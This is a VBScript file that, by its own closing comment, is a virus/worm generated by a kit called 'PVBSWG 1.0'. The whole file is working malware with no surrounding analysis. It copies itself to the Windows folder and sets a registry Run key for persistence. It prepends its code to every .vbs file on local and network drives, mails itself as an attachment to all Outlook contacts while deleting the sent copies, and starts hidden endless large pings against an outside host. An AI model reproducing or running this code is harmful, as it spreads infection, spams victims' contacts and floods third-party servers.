'toto
'Name : toto
'Author : toto
On Error Resume Next
Set veracj = CreateObject("Scripting.FileSystemObject")
Set vbrsfj = CreateObject("WScript.Shell")
Set win = veracj.GetSpecialFolder(0)
Set sys = veracj.GetSpecialFolder(1)

copyname = win&"\toto.vbs"
veracj.GetFile(WScript.ScriptFullName).Copy(copyname)
vbrsfj.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\value_worm",copyname

Set fl = veracj.OpenTextFile(WScript.ScriptFullName, 1)
virus = fl.ReadAll
fl.Close
infectfile()
Sub infectfile()
On Error Resume Next
Set veracj = CreateObject("Scripting.FileSystemObject")
Set vvow = veracj.Drives
For Each d In vvow
If d.DriveType = 2 Or d.DriveType = 3 Then
list(d.path&"\")
End If
Next
End Sub

Sub list(doss)
On Error Resume Next
Set veracj = CreateObject("Scripting.FileSystemObject")
Set hlhj = veracj.GetFolder(doss)
Set tsljf = hlhj.SubFolders
For Each f1 In tsljf
infect(f1.Path)
list(f1.Path)
Next
End Sub

Sub infect(doss)
On Error Resume Next
Set veracj = CreateObject("Scripting.FileSystemObject")
Set hlhj = veracj.GetFolder(doss)
Set fc = hlhj.Files
For Each f1 In fc
ext = veracj.GetExtensionName(f1.Path)
ext = lCase(ext)
If (ext = "vbs") Then
    Set cot = veracj.OpenTextFile(f1.Path, 1, False)
    If cot.ReadLine <> "'toto" Then
    cot.Close
    Set cot = veracj.OpenTextFile(f1.Path, 1, False)
    vbsorg = cot.ReadAll()
    cot.Close
    Set inf = veracj.OpenTextFile(f1.Path, 2, True)
    inf.WriteLine virus
    inf.WriteLine ""
    inf.WriteLine (vbsorg)
    inf.Close
    End If
End If
Next
End Sub

Set srlj = CreateObject("Outlook.Application")
Set hkdd = srlj.GetNameSpace("MAPI")
For each c In hkdd.AddressLists
If c.AddressEntries.Count <> 0 Then
For d = 1 To c.AddressEntries.Count
Set yufkg = srlj.CreateItem(0)
yufkg.To = c.AddressEntries(d).Address
yufkg.Subject = "Salut!!"
yufkg.Body = "coucou"
yufkg.Attachments.Add(copyname)
yufkg.DeleteAfterSubmit = True
If yufkg.To <> "" Then
yufkg.Send
End If
Next
End If
Next

vbrsfj.Run ("ping.exe -t -l 20000 www.yahoo.com"),vbHide
vbrsfj.Run (win&"\ping.exe -t -l 20000 www.yahoo.com"),vbHide

'This VBS virus/worm was generated by PVBSWG 1.0
